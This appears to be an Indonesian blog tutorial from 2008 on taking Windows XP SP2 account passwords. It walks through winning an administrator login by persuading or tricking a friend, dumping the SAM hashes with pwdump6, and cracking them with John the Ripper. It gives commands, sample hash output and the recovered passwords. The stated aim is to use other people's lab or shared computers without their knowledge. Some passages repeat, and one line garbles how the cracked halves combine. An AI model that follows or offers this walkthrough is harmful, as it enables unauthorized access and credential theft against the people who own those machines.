Hacking Password Windows XP SP2 Administrator
Thursday, 10. January 2008, 15:09:27
Apakah anda pernah
menggunakan komputer di Lab atau pinjam komputer teman atau bahkan menggunakan
komputer di tempat umum? Nah, biasanya klo di Lab (berdasarkan pengalaman pribadi)
komputer pasti di-password dan jika ingin masuk harus tanya dulu ke sang
empunya. Nah, sekarang kita dapat melihat password dari komputer yang kita
gunakan tanpa merestart komputer atau pun tanpa menginstall program apapun
seperti Cain ( http://www.oxid.it/cain.html ), L0pthCrack, dsb. Hanya dibutuhkan
sedikit ?kepercayaan? untuk meminjam komputer (istilah kerennya social
engineering) dan 2 buah program, yaitu pwdump6 ( http://www.foofus.net/fizzgig/pwdump ) dan john the ripper ( http://www.openwall.com/john ).
Tapi klo kebetulan ada login
umum dengan tipe administrator, itu namanya Hoki! ga perlu cape2 pinjam login
teman lagi Very Happy.
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey ( http://studenti.unina.it/~ncuomo/syskey ) untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :
Sebelumnya mungkin anda pernah mendapatkan tutorial mengenai cara menge-hack password user yang ada Windows XP atau NT menggunakan pwdump. Yup, mungkin tutorial ini akan mirip dengan bagaimana cara menge-hack Windows XP, terutama Windows XP SP2. Lalu apa bedanya dengan tutorial yang lain? Saat ini Windows XP SP2 (atau mungkin juga SP1, CMIIW), menggunakan Syskey ( http://studenti.unina.it/~ncuomo/syskey ) untuk memproteksi agar HASH (tempat menyimpan password yang dienkripsi) tidak dapat dibaca dan didump menggunakan pwdump atau samdump. Untuk lebih jelasnya berikut penjelasan mengenai Syskey [1] :
Syskey is a Windows feature that adds an additional encryption layer to
the password hashes stored in the SAM
database. The main purpose of this feature is to deter ?offline? attack. In
fact one of the most common ways to gather passwords is to copy the system SAM database and then use one of the many good
password crackers to ?recover? the passwords; of course physical access is
almost always required. So with syskey the attacker needs to remove the
additional encryption layer to get the password hashes.
Jika dulu mungkin di Windows NT atau XP (sebelum SP2), kita masih bisa
menggunakan pwdump atau bahkan langsung dengan KaHT, maka untuk Windows XP SP2
cara tersebut tidak dapat digunakan lagi (mungkin lebih tepatnya, pwdump
tersebut tidak dapat digunakan lagi). Nah disinilah letak perbedaan dengan
tutorial sebelumnya. Jika sebelumnya kita menggunakan pwdump versi lama, maka
sekarang digunakan pwdump6 yang dikembangkan oleh fizzgig and the foofus.net
Team. Kalau baca README dari pwdump6 ini, maka pwdump6 adalah :
pwdump6 is a password hash dumper for Windows 2000 and later systems.
It is capable of dumping LanMan and NTLM hashes as well as password hash
histories. It is based on pwdump3e, and should be stable on XP SP2 and 2K3. If
you have had LSASS crash on you using older tools, this should fix that.
A significantly modified version of pwdump3e, this program is able to
extract NTLM and LanMan hashes from a Windows target, regardless of whether
Syskey is turned on. It is also capable of displaying password histories if
they are available. It outputs the data in L0phtcrack-compatible form, and can
write to an output file
Oh iya, agar pwdumpd6 dapat dijalankan dan mendapatkan HASH file
dibutuhkan account yang mempunyai akses setara dengan Administrator. Nah, oleh karena itu kita harus menjalankan
sedikit social engineering. Bilang aja ketemen kita, klo mengakses workgroup,
tapi ga bisa klo pake login biasa. Tapi tenang aja, biasanya secara default
orang-orang kebanyakan mebuat user dengan tipe account Administrator. Atau
gunakan berbagai macam cara, daya, upaya maupun rayuan agar kita bisa dapat
login terlebih dulu.
Jika udah punya akses dengan
login tipe adiministrator, cara selanjutnya adalah tinggal menjalankan pwdump6.
Jika anda punya flashdisk, simpan dan bawa terus pwdump6 ini kemanapun ada
pergi, siapa tahu berguna suatu saat.. Very Happy. Ok, langsung aja kita
jalankan pwdump6 ini. Sebaiknya copy dulu pwdump6 ke Hardisk (jangan dijalankan
dari flashdik). Sebelumnya downlod dulu pwdump6 ini dari ini ( http://www.foofus.net/fizzgig/pwdump/pwdump6-1.4.3.zip ).
- Jalankan CMD (Run->cmd)
- Jalankan pwdump6 seperti berikut (misalnya PwDump6
berada di folder D:\PwDump6)
D:\PwDump6>PwDump.exe -o pass.txt 127.0.0.1
pwdump6 Version 1.3.0 by fizzgig and the mighty group at foofus.net
Copyright 2006 foofus.net
This program is free software under the GNU
General Public License Version 2 (GNU GPL), you can redistribute it and/or
modify it under the terms of the GNU GPL, as published by the Free Software
Foundation. NO WARRANTY, EXPRESSED OR IMPLIED, IS GRANTED WITH THIS
PROGRAM. Please see the COPYING file included with this program
and the GNU GPL for further details.
Using pipe {C411BDE9-594E-47F4-99B5-E94ADF194A45}
Key length is 16
Completed. - Setelah itu akan didapatkan file pass.txt yang
berisi daftar user dan password yang masih dienkripsi. Contohnya akan
tampak seperti berikut :
ach:1003:2BFA42D08601B951ABD697149E2F5967:73098347042E9109FA584CE843018F4F:::
Administrator:500:934A4750EC9859B3EA397B0F6EC18E34:732BD09D6834DA4A5A30300A6A045BF8:::
coba:1004:FBE4F28EE205F0BA79999C25263AA9AA:A69C199A4DF77CD41FCA6EA916A93868:::
Guest:501:NO PASSWORD********************* :NO PASSWORD*********************:::
HelpAssistant:1000:B3D2AE56C93F27B43C4F8419B1A21E9B: DC3DBB258A10B0C7EA9D92133267B905:::
SUPPORT_388945a0:1002:NO PASSWORD*********************: DF1DB672DA1B5C045ECA2490CA753D3B::: - Yosh!! password sudah ditangan. Proses selanjutnya adalah menge-crack file pass.txt dengan bantuan John The Ripper. Sebaiknya simpan dulu file pass.txt ke USB atau upload ke tempat yang aman, karena proses cracking ini bisa dilakukan kapan saja dan dimana saja. Berdasarkan pengalaman, kalau passwordnya tidak terlalu sulit ditebak seperti ?adminkeren?, ?qwerty123?, biasanya dibutuhkan waktu yang tidak terlalu lama untuk mengecracknya lewat John The Ripper. Tapi kalau password menggunakan kombinasi yang aneh-aneh seperti ?P4ssW0rD?, ?S03S4h?, dsb, biasanya membutuhkan waktu lama, bisa ditinggal tidur atau maen aja dulu. Ok, sekarang gini nih cara ngecraknya.
Download John The Ripper untuk Windows disini ( http://www.openwall.com/john/e/john171w.zip
). Untuk komputer yang menggunakan Prosesor AMD,
sebaiknya menggunakan ?john-mmx.exe?. Atau bagi yang menggunakan intel atau AMD,
dapat menggunakan ?John-386.exe?. Sebelumnya copy file pass.txt ke dalam
folder tempat ?John-mmx.exe? atau ?John-386.exe? berada
(John171w\john1701\run). Setelah itu tinggal jalankan perintah berikut dan
tunggu dengan sabar :
D:\john171w\john1701\run>john-mmx.exe
pass.txt
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)
Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user ?Administrator? adalah ?adminkeren123?, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.
Loaded 8 password hashes with no different salts (NT LM DES [64/64 BS MMX])
REN123 (Administrator:2)
TEBAK (coba:2)
ADMINKE (Administrator:1)
MUDAHDI (coba:1)
Yosh!! sekarang passwordnya sudah terlihat secara kasat mata. Jadi password untuk user ?Administrator? adalah ?adminkeren123?, diperoleh dari menggabungkan Administrator:2 dan Administrator:2.
Administrator:1+Administrator:2 = adminkeren123
Sedangkan untuk user ?coba? adalah ?mudahditebak?!!
Sedangkan untuk user ?coba? adalah ?mudahditebak?!!
Mudah bukan? Intinya sih
tinggal ambil HASH file (password yang dienkripsi) menggunakan pwdump6 lalu
crack hasilnya dengan John The Ripper.
Nah, sekarang kalau kita mau
pakai komputer teman di Lab, ga usah cari2 orangnnya lagi. Tinggal pake aja
langsung user Admin lagi, tapi jangan sampai ketahuan ama dia?.. Atau klo anda
lupa password Administrator, tidak perlu mereboot komputer, lalu mereset
password anda. Tinggal ikut langkah2 diatas aja!
0 komentar:
Posting Komentar